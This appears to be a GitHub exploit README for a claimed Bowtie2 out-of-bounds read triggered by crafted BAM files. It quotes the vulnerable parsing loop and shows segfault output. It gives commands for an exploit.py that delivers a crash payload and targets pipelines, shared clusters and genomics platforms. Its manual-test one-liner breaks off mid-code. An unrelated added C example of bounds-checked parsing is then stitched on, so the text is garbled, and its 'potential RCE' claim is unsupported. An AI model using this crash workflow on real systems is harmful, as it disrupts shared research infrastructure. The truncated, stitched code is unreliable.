jabir-dev/CVE-2026-Bowtie2-OOB


# CVE-2026-XXXXX: Bowtie2 Out-of-Bounds Read via Crafted BAM

## Overview

| Field | Value |
|-------|-------|
| **Product** | Bowtie2 |
| **Vendor** | BenLangmead |
| **Versions** | 0 through 2.5.4 (all versions) |
| **Type** | Out-of-bounds Read (CWE-125) |
| **CVSS 4.0** | 8.7 High |
| **Impact** | Denial of Service / Information Disclosure |
| **bio.tools** | https://bio.tools/bowtie2 |

## Vulnerability

```cpp
// pat.cpp:1376-1381
memcpy(&nref, &alignment_batch[0] + i, sizeof(nref));
i += sizeof(nref);
for (uint32_t j = 0; j < nref; j++) {  // nref from untrusted file!
    uint32_t l_name;
    memcpy(&l_name, &alignment_batch[0] + i, sizeof(l_name));  // OOB READ
    i = i + sizeof(l_name) + l_name + sizeof(uint32_t);  // i grows unbounded
}
```

## Crash Evidence

```
$ bowtie2 -x ref_idx -b crafted.bam --no-head
Segmentation fault (core dumped)
$ echo $?
139
```

## Impact

- **Denial of Service**: Guaranteed crash via SIGSEGV
- **Information Disclosure**: OOB read can leak adjacent heap memory
- **Potential RCE**: In specific heap layouts, chaining with write primitive

## Attack Surfaces

1. **Bioinformatics pipelines** processing untrusted BAM files
2. **Shared HPC clusters** where users share BAM files
3. **Web-based genomics platforms** accepting BAM uploads
4. **Galaxy Project** workflows with BAM input

## Usage

```bash
# Check if bowtie2 is vulnerable
python3 exploit.py --bt2 ./bowtie2 --index ref_idx --mode check

# Deliver crash payload
python3 exploit.py --bt2 ./bowtie2 --index ref_idx --mode crash

# Information disclosure analysis
python3 exploit.py --bt2 ./bowtie2 --index ref_idx --mode info

# Save crash BAM for manual testing
python3 exploit.py --bt2 ./bowtie2 --index ref_idx --save-bam crash.bam
```

### Quick Manual Test

```bash
python3 -c "
import struct, zlib
bam = b'BAM\x01' + struct.pack('
```
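The bounds checks that the loop under "Vulnerability" lacks, written as a stand-alone C function. This is an added example, not Bowtie2 code or a patch from the project; `skip_ref_list`, `read_u32le` and the sample buffers are hypothetical names and constructed data, and the example assumes the buffer holds the already-decompressed reference list starting at `nref`.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Read a little-endian uint32 at buf[*pos], only if 4 bytes remain. */
static int read_u32le(const uint8_t *buf, size_t len, size_t *pos, uint32_t *out)
{
    if (*pos > len || len - *pos < 4)
        return -1;
    const uint8_t *p = buf + *pos;
    *out = (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
    *pos += 4;
    return 0;
}

/* Hypothetical helper: walk nref entries of (l_name, name, l_ref) from *pos.
 * Returns 0 and advances *pos past the list; returns -1 and leaves *pos
 * unchanged if any field would extend beyond len. */
int skip_ref_list(const uint8_t *buf, size_t len, size_t *pos)
{
    size_t i = *pos;
    uint32_t nref, l_name;
    if (read_u32le(buf, len, &i, &nref) != 0)
        return -1;
    for (uint32_t j = 0; j < nref; j++) {
        if (read_u32le(buf, len, &i, &l_name) != 0)
            return -1;
        /* name plus the 4-byte l_ref must fit; subtract, never add, to avoid wraparound */
        size_t remaining = len - i;
        if (remaining < 4 || l_name > remaining - 4)
            return -1;
        i += (size_t)l_name + 4;
    }
    *pos = i;
    return 0;
}

/* Constructed samples: one valid entry ("chr1"), and a list claiming 2^32-1 entries. */
static const uint8_t GOOD[] = {1,0,0,0, 5,0,0,0, 'c','h','r','1',0, 16,0,0,0};
static const uint8_t BAD[]  = {0xFF,0xFF,0xFF,0xFF, 0xFF,0xFF,0xFF,0x7F, 'x'};

int main(void)
{
    size_t a = 0, b = 0;
    printf("good: %d\n", skip_ref_list(GOOD, sizeof GOOD, &a));
    printf("bad:  %d\n", skip_ref_list(BAD, sizeof BAD, &b));
    return 0;
}
```

Every read is checked against the remaining length before the offset moves, so an oversized `nref` or `l_name` ends parsing with an error instead of walking past the buffer.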